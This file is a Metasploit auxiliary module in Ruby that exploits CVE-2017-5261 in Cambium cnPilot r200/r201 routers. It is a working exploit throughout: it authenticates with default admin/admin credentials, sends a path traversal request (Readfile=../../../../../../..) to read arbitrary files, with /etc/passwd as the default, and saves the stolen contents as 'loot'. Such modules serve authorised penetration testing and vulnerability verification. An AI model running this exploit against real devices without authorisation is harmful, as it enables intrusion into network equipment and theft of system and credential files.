1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::CNPILOT
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Cambium cnPilot r200/r201 File Path Traversal',
14
        'Description' => %q{
15
          This module exploits a File Path Traversal vulnerability in Cambium
16
          cnPilot r200/r201 to read arbitrary files off the file system. Affected
17
          versions - 4.3.3-R4 and prior.
18
        },
19
        'Author' => [
20
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
21
        ],
22
        'References' => [
23
          ['CVE', '2017-5261'],
24
          ['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
25
        ],
26
        'License' => MSF_LICENSE,
27
        'Notes' => {
28
          'Stability' => [CRASH_SAFE],
29
          'SideEffects' => [IOC_IN_LOGS],
30
          'Reliability' => []
31
        }
32
      )
33
    )
34

35
    register_options(
36
      [
37
        OptInt.new('TIMEOUT', [true, 'HTTP connection timeout', 10]),
38
        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
39
        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
40
        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),
41
        OptString.new('FILENAME', [true, 'Filename to read', '/etc/passwd'])
42
      ]
43
    )
44

45
    deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')
46
  end
47

48
  def run_host(_ip)
49
    unless is_app_cnpilot?
50
      return
51
    end
52
  end
53

54
  #
55
  # Read file
56
  #
57

58
  def read_file(the_cookie)
59
    print_status("#{rhost}:#{rport} - Accessing the file...")
60
    file = datastore['FILENAME']
61
    fileuri = "/goform/logRead?Readfile=../../../../../../..#{file}"
62
    final_url = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + fileuri.to_s
63

64
    res = send_request_cgi(
65
      {
66
        'uri' => fileuri,
67
        'method' => 'GET',
68
        'cookie' => the_cookie,
69
        'headers' => {
70
          'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
71
        }
72
      }
73
    )
74

75
    if res && res.code == 200
76
      results = res.body
77

78
      if results.empty?
79
        print_status('File not found.')
80
      else
81
        print_good(results.to_s)
82

83
        # w00t we got l00t
84
        loot_name = 'fpt-log'
85
        loot_type = 'text/plain'
86
        loot_desc = 'Cambium cnPilot File Path Traversal Results'
87
        data = results.to_s
88
        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
89
        print_good("File saved in: #{p}")
90
      end
91
    else
92
      print_error("#{rhost}:#{rport} - Could not read file. You can manually check by accessing #{final_url}.")
93
      return
94
    end
95
  end
96

97
  #
98
  # Login & initiate file read
99
  #
100

101
  def run_login
102
    cookie, _version = do_login(datastore['USERNAME'], datastore['PASSWORD'])
103
    if cookie == 'skip'
104
      return
105
    else
106
      read_file(cookie)
107
    end
108
  end
109
end
110

111